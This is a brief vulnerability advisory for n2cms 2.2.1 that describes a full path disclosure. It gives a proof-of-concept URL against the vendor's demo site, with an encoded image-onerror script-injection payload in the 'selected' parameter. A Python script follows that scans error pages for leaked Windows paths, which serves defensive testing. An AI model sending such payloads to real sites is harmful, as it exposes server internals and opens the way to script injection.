`# Affected software: n2cms
# Type of vulnerability: full path disclosure
# URL: n2cms.com
# Discovered by: provensec
# Website: provensec.com
# Version: *2.2.1* <http://n2cms.codeplex.com/releases>
# Proof of concept
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f
Manipulating the selected parameter causes an error to be displayed that discloses the system path.
`
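As an added example (not part of the original advisory or of n2cms): a regression check that scans an HTTP response body for absolute Windows paths, which is how a full path disclosure of this kind shows up in an error page. The function names and both sample bodies are constructed for illustration, and the detailed-error sample assumes an ASP.NET-style error page.

```python
import html
import re

# Absolute Windows paths: drive-letter (C:\dir\file) or UNC (\\host\share\file).
# Paths containing spaces are reported only up to the first space.
_WINDOWS_PATH = re.compile(
    r"(?<![A-Za-z0-9])(?:[A-Za-z]:\\|\\\\[\w.$-]+\\)[^\s\"'<>|*?:]+"
)

# Constructed sample bodies, not captured from any real site. The first
# assumes an ASP.NET-style detailed error page; the second is a generic one.
DETAILED_ERROR = (
    "<html><body><h2>Server Error in '/' Application.</h2>"
    "<b>Source File:</b> D:\\sites\\example\\N2\\Files\\FileSystem\\File.aspx.cs "
    "<b>Line:</b> 42<br>"
    "at Example.Page_Load() in D:&#92;sites&#92;example&#92;App_Code&#92;Util.cs:line 7"
    "</body></html>"
)
GENERIC_ERROR = (
    "<html><body><h2>Something went wrong.</h2>"
    '<a href="/upload/">Back to files</a> or see http://example.test/help'
    "</body></html>"
)


def find_path_leaks(body):
    """Return the distinct absolute Windows paths found in a response body."""
    text = html.unescape(body)  # decode entities such as &#92; before matching
    leaks = []
    for match in _WINDOWS_PATH.finditer(text):
        path = match.group(0).rstrip(".,;)")
        if path not in leaks:
            leaks.append(path)
    return leaks


def audit(responses):
    """Map each response label to its leaked paths, omitting clean responses."""
    report = {}
    for label, body in responses.items():
        leaks = find_path_leaks(body)
        if leaks:
            report[label] = leaks
    return report


if __name__ == "__main__":
    print(audit({"detailed": DETAILED_ERROR, "generic": GENERIC_ERROR}))
```

Feeding the bodies of error responses from a staging site into `audit` after a fix gives a quick pass/fail signal: an empty result means no absolute path was found.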